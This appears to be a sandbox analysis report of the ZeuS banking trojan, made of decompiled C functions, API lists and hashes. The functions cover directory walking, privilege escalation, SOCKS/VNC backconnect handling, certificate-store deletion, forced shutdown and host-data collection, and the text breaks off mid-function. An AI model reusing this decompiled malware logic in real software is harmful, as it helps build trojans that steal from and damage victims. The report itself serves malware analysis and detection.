Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*
API String ID: 2400141425-3267162389
Opcode ID: ff006e4c8d9e38cf2f77b5d03895a51913193254b6d0c3d64b140312574f7554
Instruction ID: 47e0c72d8f6fc820f90c99b4c3c67a230007a10c331b6f7aa76d0301b9cc1d03
Opcode Fuzzy Hash: ff006e4c8d9e38cf2f77b5d03895a51913193254b6d0c3d64b140312574f7554
Instruction Fuzzy Hash: CFE17871508301AFC710DF69C980AABB7E5FF88318F00492EF895E7291D778E955CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A91B, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A91B(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E0040AA77("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0040A677( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040AA77( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E0040A91B( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x0040a938
0x0040a93c
0x0040a940
0x0040a947
0x0040aa6e
0x0040aa74
0x0040aa74
0x0040a95a
0x0040a960
0x0040a967
0x0040a96d
0x0040a976
0x0040a976
0x0040a97b
0x00000000
0x00000000
0x0040a99d
0x0040aa4d
0x0040aa5e
0x00000000
0x00000000
0x00000000
0x0040aa5e
0x0040a9a7
0x0040a9aa
0x0040a9b3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a9ba
0x0040a9ba
0x0040a9bd
0x0040a9fa
0x0040a9ff
0x0040aa1f
0x0040aa23
0x0040aa28
0x0040aa28
0x0040aa48
0x0040aa48
0x00000000
0x0040a9ff
0x0040a9bf
0x0040a9d5
0x0040a9d9
0x00000000
0x00000000
0x00000000
0x0040a9db
0x0040a9e8
0x0040a9eb
0x0040a9ed
0x00000000
0x00000000
0x0040a9ef
0x0040a9f3
0x0040a9f8
0x0040a9f8
0x00000000
0x0040a9f3
0x0040a9aa
0x0040aa68
0x0040aa68

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040A95A
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040A981
PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040A9CB
Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040A9F8
Sleep.KERNEL32(00000000,?,?), ref: 0040AA28
FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040AA56
FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040AA68

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: b1dcf7820d8df5e7ab2b5d9487a7abef7fa89d02134b19c5f361703a734a28c2
Instruction ID: ed2645ebbb87d90eca358f0690877814f502cc3c3a9a4f824e661dffbb9f6bcd
Opcode Fuzzy Hash: b1dcf7820d8df5e7ab2b5d9487a7abef7fa89d02134b19c5f361703a734a28c2
Instruction Fuzzy Hash: FA4180712043069BCB21DF14CD44ADF7BA5EF44384F05493AF895A22E1D339C9A5DF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004068B2, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068B2(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x004068bd
0x004068d1
0x004068f0
0x004068f8
0x00406907
0x00406928
0x00406928
0x0040692d
0x00000000
0x004068e5
0x00000000
0x004068e5

APIs

GetCurrentThread.KERNEL32 ref: 004068C2
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068C9
OpenProcessToken.ADVAPI32(000000FF,00000020,0040C177,?,?,?,?,0040C177,SeTcbPrivilege), ref: 004068DB
LookupPrivilegeValueW.ADVAPI32(00000000,0040C177,?), ref: 004068FF
AdjustTokenPrivileges.ADVAPI32(0040C177,00000000,00000001,00000000,00000000,00000000), ref: 00406914
GetLastError.KERNEL32 ref: 0040691E
CloseHandle.KERNEL32(0040C177), ref: 0040692D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: bff099fbe7444e0be16baf7303fa87e618fc1c4cb14979851ef0f0df6a3b5267
Instruction ID: c92560ec7cb180530b72f99183430393ff3ba2c87d00fb0c43f3b7c83159b759
Opcode Fuzzy Hash: bff099fbe7444e0be16baf7303fa87e618fc1c4cb14979851ef0f0df6a3b5267
Instruction Fuzzy Hash: 2F010CB2600209BFEB109FA5DD89EEF7BBCEB15349F004076F506F11A0E77589949A39

Uniqueness

Uniqueness Score: -1.00%

Function 0040648B, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0040AABE,00000000,00000000,00000001,F0000040,00000000,0040AABE,?,00000030,?,?,?,0040AFD7,?), ref: 004064A4
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,0040AFD7,?), ref: 004064BC
CryptHashData.ADVAPI32(?,00000010), ref: 004064D8
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004064F0
CryptDestroyHash.ADVAPI32(?), ref: 00406507
CryptReleaseContext.ADVAPI32(?,00000000,?,?,0040AFD7,?), ref: 00406511

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
Instruction ID: fb2087c92360e746e9816ed37e6810f150e1723b9e20ca2eb9aa117fe24c8363
Opcode Fuzzy Hash: 47821d2d89af19a63f5beecb4a05f9dfd75e647a1c983ce95bb941014fa1f7da
Instruction Fuzzy Hash: 0611F7B180024CBFEF119F94DD84EEE7B7DEB04344F004461F652B11A1D7768EA49B28

Uniqueness

Uniqueness Score: -1.00%

Function 00419904, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419904(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E00405299( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, "socks") != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00405865( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E004092E7( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E004051E6( *_t121);
								E004051E6(_t121[1]);
								E004051E6(_t121[2]);
								E004089B9(_t121[3]);
								E004051E6(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E0040826F(E00405865(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E004085E1(_t123, _t130);
						E0040859F(_t130);
						_t89 = E0040603D(E0041CC4A(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E00408589(_t89, _t130);
							goto L32;
						}
						_v9 = E0040B88A( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E0040602B( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E00408496(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E00408199(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E004051B6(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E004081E1(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E00408199((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E004051E6();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E004051E6();
							if(_v6 != 0) {
								_t139 = E004051B6(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E00408199(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E004051B6(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E004092A2( &_v304, 0x20000, E0041967B, _t131) == 0) {
											E004051E6(_t131);
										}
									}
									E00409250(_t127,  &_v304);
								}
								E004051E6(_v20);
								_t89 = E00408496(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x00419904
0x0041991e
0x00419923
0x00419937
0x00419946
0x00419948
0x0041994a
0x00419959
0x0041995e
0x0041995e
0x00419961
0x00419967
0x00419b40
0x00419b46
0x00419b52
0x00419b56
0x00419b77
0x00419b79
0x00419b81
0x00419b89
0x00419b91
0x00419b97
0x00419ba2
0x00000000
0x00000000
0x00000000
0x00419b58
0x00419b58
0x00419b63
0x00419b69
0x00419b6f
0x00000000
0x00419b58
0x0041996d
0x00419970
0x00419973
0x00419975
0x00000000
0x00000000
0x0041997b
0x0041998d
0x0041998f
0x00419995
0x00000000
0x00000000
0x0041999c
0x004199a2
0x004199bf
0x004199c4
0x004199c6
0x00419b39
0x00419b3b
0x00000000
0x00419b3b
0x004199dd
0x004199e0
0x004199e9
0x00000000
0x00000000
0x004199f9
0x004199fe
0x00419a03
0x00000000
0x00000000
0x00419a0e
0x00419a0e
0x00419a12
0x00419a15
0x00419a1f
0x00000000
0x00000000
0x00419a39
0x00419a3b
0x00419a3e
0x00419b27
0x00419b2b
0x00419b2f
0x00419b2f
0x00419b30
0x00419b31
0x00000000
0x00419b31
0x00419a4b
0x00419a4c
0x00419a4e
0x00419a53
0x00419a56
0x00419ba5
0x00419ba5
0x00000000
0x00419ba5
0x00419a60
0x00419a66
0x00419a69
0x00419a73
0x00419a84
0x00419a86
0x00419a8a
0x00419a8b
0x00419a8d
0x00000000
0x00000000
0x00419a93
0x00419a94
0x00419a96
0x00419a9b
0x00419a9d
0x00419bac
0x00000000
0x00419bac
0x00419aa3
0x00419aa6
0x00419aaa
0x00419ab5
0x00419abb
0x00419abf
0x00419ac4
0x00419ac9
0x00419ae2
0x00419aec
0x00419aef
0x00419aef
0x00419aec
0x00419afa
0x00419afa
0x00419b02
0x00419b11
0x00419b16
0x00419b1b
0x00000000
0x00419b21
0x00000000
0x00419b21
0x00419b1b
0x00419a75
0x00000000
0x00419a75
0x00419b36
0x00000000
0x00419b36
0x0041994c
0x00000000
0x0041994c
0x00419939
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 00419933
lstrcmpiA.KERNEL32(?,vnc), ref: 00419946
CloseHandle.KERNEL32(?), ref: 00419B63

Part of subcall function 004092A2: SetLastError.KERNEL32(0000009B,0041CF3B,00000000,0041BD55,00000000,004238A8,00000000,00000104,74B5F560,00000000), ref: 004092AC

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

socks, xrefs: 0041992C
vnc, xrefs: 0041993F

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 56c2e5726c3587c2e99f3ad7fd8db4870f3c546a8bdb75a79b0a0b5396871f0e
Instruction ID: 67407032ed77c779d342cf1f9e55aefda3007ae350ac48c1e5db64994873977d
Opcode Fuzzy Hash: 56c2e5726c3587c2e99f3ad7fd8db4870f3c546a8bdb75a79b0a0b5396871f0e
Instruction Fuzzy Hash: 2671D071800115AADF11EB61C991BFE7BB4AF45318F1440ABF944BB2C1DB3C9E81CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A860, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A860(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E0040AA77("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0040A677( &(_v596.cFileName)) == 0 && E0040AA77( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0040A548( &_v1116);
						} else {
							E0040A860( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0040a86e
0x0040a882
0x0040a8fd
0x0040a903
0x0040a91a
0x0040a91a
0x0040a897
0x0040a89c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a89e
0x0040a89e
0x0040a8ac
0x0040a8c4
0x0040a8cc
0x0040a8de
0x0040a8ce
0x0040a8d2
0x0040a8d2
0x0040a8cc
0x0040a8f2
0x0040a8f7
0x00000000

APIs

Part of subcall function 0040AA77: PathCombineW.SHLWAPI(0041C3C7,0041C3C7,?,0041C3C7,?,?), ref: 0040AA96

FindFirstFileW.KERNEL32(?,?,?), ref: 0040A891
FindNextFileW.KERNEL32(00000000,?), ref: 0040A8EC
FindClose.KERNEL32(00000000), ref: 0040A8F7
SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040A903
RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040A90A

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 788bd1e6f0a7cbe700e6a516b9c68c347416b3fa3895f5d41dc9e0c09789f0bb
Instruction ID: 525998673f35c9a886aec5022be3c88710817ef3340b581ddacb40b52d4fcd61
Opcode Fuzzy Hash: 788bd1e6f0a7cbe700e6a516b9c68c347416b3fa3895f5d41dc9e0c09789f0bb
Instruction Fuzzy Hash: 5E1190320043046AD320FBA4DD49AEB77ECAF45314F048A3FF995E21E0EB389956965B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D15A, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004034D0), ref: 0040D165
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040D17E
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0041D09E), ref: 0040D189
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D191
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D19D

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: acb7a41491756702a2de7be5948fed1913558742de31d3a4539f3498868ef8a0
Instruction ID: a971cc37060601c790609cbb378733f98f7bb19b4ad6eaa53be113373cc6555b
Opcode Fuzzy Hash: acb7a41491756702a2de7be5948fed1913558742de31d3a4539f3498868ef8a0
Instruction Fuzzy Hash: 24F0A0326812147AD32117B96D18FB7BB6C9F42B91F040133FA88F66A08E389845856C

Uniqueness

Uniqueness Score: -1.00%

Function 0041907D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041907D(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;

				_t12 =  *0x42388c;
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0040CAB3(__ebx, __ecx, __eflags);
						_t12 =  *0x42388c;
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E004068B2(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x42388c >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E0041D626( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x4239b0 =  *0x4239b0 | 0x00000010;
						E0041D67E( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x00419080
0x0041908a
0x004190af
0x004190b1
0x004190b3
0x004190b8
0x004190b8
0x004190bd
0x004190bf
0x004190ea
0x004190ec
0x00000000
0x00000000
0x00000000
0x004190c1
0x004190c6
0x004190dd
0x004190e2
0x004190e9
0x004190e9
0x0041908c
0x00419090
0x00419097
0x00419099
0x0041909d
0x004190a8
0x004190ee
0x00000000
0x004190f5
0x004190fc
0x004190fc
0x004190fc

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 004190E2

Part of subcall function 0041D626: CreateMutexW.KERNEL32(004239E8,00000000,00423EF8,?,?,0040CE53,?,?,?,743C152E,00000002), ref: 0041D64C

ExitWindowsEx.USER32(00000014,80000000), ref: 004190F5

Strings

SeShutdownPrivilege, xrefs: 004190C1
, xrefs: 00419099

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: 569a9c211cf9c26b758d03db1a96e6e92bf0f8eee8c5dc1f83e1f0a00eb15d06
Instruction ID: 953f36de6ad79133a5a508d25809b9843900d86f62864819fd1a03bafe1b96fb
Opcode Fuzzy Hash: 569a9c211cf9c26b758d03db1a96e6e92bf0f8eee8c5dc1f83e1f0a00eb15d06
Instruction Fuzzy Hash: DAF0FE716042095AFE24ABF45C56BE93FB89705349F50402DF981F71A2C76C9D838B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00417DDC, Relevance: 6.2, APIs: 4, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00417DDC(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0040AAD3(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if(__eflags == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2000809;
						_t99 = E0040AAE7(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E004051E6( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00417D28(_t106, _t111, 2);
									E00417D28(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0040AB94(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0040AB94(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0041C007(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0040AAE7(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0040AAE7(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004052E8();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0040AAE7(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00405310();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0040AAE7(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
